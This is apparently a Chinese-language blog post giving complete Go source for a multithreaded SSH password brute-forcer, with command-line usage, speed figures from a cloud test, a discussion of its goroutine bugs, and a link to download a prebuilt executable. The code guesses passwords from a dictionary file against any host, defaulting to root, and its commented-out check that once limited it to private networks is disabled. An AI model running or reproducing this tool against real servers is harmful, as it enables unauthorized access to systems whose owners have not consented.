源碼如下:
package main import ( "bufio" "flag" "fmt" "golang.org/x/crypto/ssh" "io" "os" "regexp" "runtime" "sync" "time" ) var ( file string host string port int user string ) var exit = make(chan bool) var starttime = time.Now() var wg = sync.WaitGroup{} var cpunum = runtime.NumCPU() func init() { //獲取命令行配置信息 flag.StringVar(&file,"f","pass.txt","密碼文件") flag.StringVar(&host,"h","127.0.0.1","ip地址") flag.IntVar(&port,"p",22,"端口地址") flag.StringVar(&user,"u","root","用戶名") } func main(){ defer testtime(starttime) flag.Parse() //match := CheckIp(host) //if !match { // fmt.Println("ip錯誤,只能用於內網ip地址。\n正則驗證規則:`^(192\\.168(\\.(\\d|[1-9]\\d|1\\d{2}|2[0-4]\\d|25[0-5])){2}|172\\.(1[6-9]|2\\d|3[0,1])(\\.(\\d|[1-9]\\d|1\\d{2}|2[0-4]\\d|25[0-5])){2}|10(\\.(\\d|[1-9]\\d|1\\d{2}|2[0-4]\\d|25[0-5])){3})$`") // return //} if host == "127.0.0.1" { fmt.Printf("[-]Usage %s -h=192.168.1.1\n",os.Args[0]) fmt.Println("密碼字典默認為同目錄下的:pass.txt。可以通過:-f=xx.txt指定") return } passchan := make(chan string) //開啟一個pass讀取協程將讀取到的密碼賦予給一個passchan通道。 go func(){ file,err := os.Open(file) if err != nil { fmt.Println(err) os.Exit(1) } defer file.Close() bf := bufio.NewReader(file) for { str,err := bf.ReadString('\n') if err != nil { if err == io.EOF { fmt.Println("文件讀取完畢") }else { fmt.Println("讀取文件錯誤",err) } close(passchan) return } passchan<- str[:len(str)-2] } }() //開啟一個ssh鏈接協程,監聽passchan通道,並創建鏈接 ip := fmt.Sprintf("%s:%d", host, port) worknum := (cpunum-1)*20 for i:=0; i<worknum; i++ { wg.Add(1) go SshConnect(ip,passchan) } wg.Wait() //time.Sleep(time.Second*15) } //ssh鏈接函數 func SshConnect(ip string, passchan chan string) { for { select { case pass,ok := <-passchan : if !ok { wg.Done() return } client := &ssh.ClientConfig{ User: user, Timeout: time.Second, HostKeyCallback: ssh.InsecureIgnoreHostKey(), Auth: []ssh.AuthMethod{ssh.Password(pass)}, } _,err := ssh.Dial("tcp",ip,client) if err == nil { fmt.Printf("%s 爆破成功。賬號:%s,密碼:%v",ip,client.User,pass) testtime(starttime) os.Exit(1) } case <-time.After(time.Second * 60) : fmt.Println("鏈接ssh出錯,在select處退出") os.Exit(1) } } } func CheckIp(ip string) bool { // 0-255 //(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]) //192.168.0.0 - 192.168.255.255 //192\.168(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){2} //172.16.0.0 - 172.31.255.255 //172\.(1[6-9]|2\d|3[0,1])(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){2} //10.0.0.0 - 10.255.255.255 //10(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){3} match,err := regexp.MatchString(`^(192\.168(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){2}|172\.(1[6-9]|2\d|3[0,1])(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){2}|10(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){3})$`,ip) if err != nil{ fmt.Println(err) return false } return match } func testtime(start time.Time) { fmt.Println("運行時間:",time.Since(start)) }
並發數為:(CPU-1)*20。我本地4核,也就是60條並發協程。
ssh鏈接超時為1秒,經過測試1000條記錄,20s跑完。(香港阿里雲機器)
使用:
xxx.exe -h=192.168.1.1 -p=22 -f=mima.txt -u=root
其中:-p可以不指定,默認為22端口。-u可以不指定,默認為root。-f可以不指定,默認為同目錄下的pass.txt文件。
其中的 Checkip 函數原目的為限制ip只能為內網ip地址,但只有公網測試地址,就沒使用了。
總結:
通過 sync 包下的 WaitGroup 來控制所有協程的結束,但是這里卻有一點問題,就是假如正確密碼在文本的最后幾行(差不多20行內),卻得不到正確的返回。
猜測可能是最后的協程並沒有執行完畢,協程就被迫結束了。我在最后添加了延遲10秒,發現效果也不好,不知道怎么解決這個問題。
同時文本最后一行的密碼讀取不到,因為讀取最后一行時,err == io.EOF,導致Close(chan)關閉了通道,因為上面的問題,所以這個無關緊要了。
編譯好的exe文件地址:
鏈接: https://pan.baidu.com/s/1q4V6swxn-BXpKQtq39Udcg 提取碼: 89tf